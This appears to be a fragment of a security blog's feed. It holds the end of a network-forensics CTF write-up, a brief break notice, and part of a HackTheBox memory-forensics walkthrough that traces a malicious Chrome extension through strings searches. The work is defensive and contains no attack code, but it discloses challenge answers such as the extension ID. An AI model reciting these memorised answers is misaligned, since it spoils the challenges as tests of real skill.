https://substackcdn.com/image/fetch/$s_!P49e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 1272w, https://substackcdn.com/image/fetch/$s_!P49e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>7. What is the password for the backup SSH server?</strong></p><p><strong>Tool used:</strong> NetworkMiner + file inspection</p><p><strong>How:</strong> Right-click and open the file from NetworkMiner</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fKsZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fKsZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 424w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 848w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 1272w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fKsZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png" width="757" height="83" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:83,&quot;width&quot;:757,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fKsZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 424w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 848w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 1272w, https://substackcdn.com/image/fetch/$s_!fKsZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd76b4e9b-61ee-4592-b78f-46249eb15bb1_757x83.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>8. What is the S3 bucket URL for the data archive from 2023?</strong></p><p><strong>Tool used:</strong> Open the file s3_buckets.txt in NetworkMiner</p><p><strong>How:</strong> Look for URLs referring to the 2023 archive.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MoDa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MoDa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 424w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 848w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 1272w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MoDa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png" width="1456" height="215" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:215,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MoDa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 424w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 848w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 1272w, https://substackcdn.com/image/fetch/$s_!MoDa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cd61ad7-bae2-4dcd-a8a8-41e8abef2576_1675x247.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>9. What is the internal email address used by the attacker in the phishing email?</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> Again, in s3_buckets.txt, note the email address listed for clearance.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cvPZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cvPZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 424w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 848w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 1272w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cvPZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png" width="1456" height="284" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:284,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cvPZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 424w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 848w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 1272w, https://substackcdn.com/image/fetch/$s_!cvPZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e16cc3a-f5b0-4b5f-954d-cc8f88ee498a_1688x329.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Summary</strong></p><ul><li><p><strong>Initial Entry:</strong> FTP brute force</p></li><li><p><strong>Attacker IP City:</strong> (Mumbai)</p></li><li><p><strong>Data Exfiltration:</strong> Done via FTP RETR command</p></li><li><p><strong>SSH Access:</strong> found in plaintext note</p></li><li><p><strong>Sensitive S3 URLs &amp; Email:</strong> Extracted from s3_buckets.txt</p></li></ul><p><strong>Tools Used:</strong></p><ul><li><p>NetworkMiner</p></li><li><p>Online IP Geolocation tools</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Taking a Break]]></title><description><![CDATA[Hi Folks,]]></description><link>https://www.byteberzerker.com/p/taking-a-break</link><guid isPermaLink="false">https://www.byteberzerker.com/p/taking-a-break</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Mon, 05 May 2025 11:22:44 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/50009617-97c6-48df-83b9-b28c8ba1334c_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Hi Folks,</p><p>I am taking a short break from making write-ups. As always, thanks for reading my stack!</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Stealth Invasion]]></title><description><![CDATA[Cyber Apocalypse 2025]]></description><link>https://www.byteberzerker.com/p/hackthebox-stealth-invasion</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-stealth-invasion</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Tue, 25 Mar 2025 21:28:32 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!uLQ5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>&#128373;&#65039; Stealth Invasion &#8211; CTF Write-Up</strong></p><p><strong>&#128187; Challenge Background:</strong></p><p>Selene's normally secure laptop recently fell victim to a covert attack. A <strong>malicious Chrome extension</strong> was stealthily installed under the guise of a productivity tool. After noticing <strong>unusual network activity</strong>, Selene needs to trace the attack, remove the threat, and secure her system.</p><p>Our job: <strong>analyze the memory dump</strong> and recover key pieces of forensic evidence.</p><p><strong>&#128230; Step 1: Initial Analysis</strong></p><p>After downloading and extracting the provided file, we identify it as an <strong>ELF</strong> binary:</p><p>file memdump.elf</p><p>However, both <strong>Volatility</strong> and <strong>GDB</strong> failed to process the dump &#8212; likely because this was a <strong>Windows memory dump from a WSL (Windows Subsystem for Linux)</strong> environment. Binwalk, interestingly, revealed Windows-related content, further hinting at a hybrid memory space.</p><p><strong>&#128269; Step 2: Switch to Manual Analysis</strong></p><p>With automated tools failing, we pivot to <strong>manual string analysis</strong>:</p><p>strings memdump.elf &gt; strings.txt</p><p>We perform all analysis from this point forward by searching keywords within strings.txt.</p><p><strong>&#129513; Answers</strong></p><p><strong>1. What is the PID of the Original (First) Google Chrome process:</strong></p><p>Search for:</p><p>chrome.exe</p><p>Look for the <strong>first instance</strong> of chrome.exe paired with a PID-like pattern.</p><p>Example pattern in strings:</p><p>chrome.exe --type=...<br>PID: 3456</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ml5Q!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 424w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 848w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 1272w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png" width="903" height="147" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:147,&quot;width&quot;:903,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 424w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 848w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 1272w, https://substackcdn.com/image/fetch/$s_!Ml5Q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00d6c56-7439-4daf-aa21-fb7bba4533ef_903x147.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>2. What is the only Folder on the Desktop:</strong></p><p>Search for:</p><p>Desktop</p><p>Look for a full path such as:</p><p>C:\Users\selene\Desktop\MalwareLogs</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uLQ5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uLQ5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 424w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 848w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 1272w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uLQ5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png" width="1013" height="354" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:354,&quot;width&quot;:1013,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uLQ5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 424w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 848w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 1272w, https://substackcdn.com/image/fetch/$s_!uLQ5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46c21883-7e22-4953-87b1-92f8e92396eb_1013x354.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. What is the Extension's ID:</strong></p><p>Chrome extensions are stored under:</p><p>C:\Users\&lt;user&gt;\AppData\Local\Google\Chrome\User Data\Default\Extensions\</p><p>Search for this path or look for a 32-character lowercase string (a&#8211;p) in the strings.txt:</p><p>hlkenndednhfkekhgcdicdfddnkalmdm</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jar1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jar1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 424w, https://substackcdn.com/image/fetch/$s_!jar1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 848w, https://substackcdn.com/image/fetch/$s_!jar1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 1272w, https://substackcdn.com/image/fetch/$s_!jar1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jar1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png" width="1456" height="294" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:294,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jar1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 424w, https://substackcdn.com/image/fetch/$s_!jar1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 848w, https://substackcdn.com/image/fetch/$s_!jar1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 1272w, https://substackcdn.com/image/fetch/$s_!jar1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdabf8a-b09d-4d76-bcfe-284181c1ef80_2112x426.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>4. What is the log filename in which the data is stored:</strong></p><p>Search for suspicious filenames in the extension&#8217;s strings. You&#8217;ll find keylogger-like logs such as:</p><p>logX<br>logY<br>logZ</p><p>The pattern used is consistent, and all logs begin with log.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!y42Z!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!y42Z!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92c0de1a-37eb-4819-8c08-3a30b702a6ee_1859x245.png 424w, 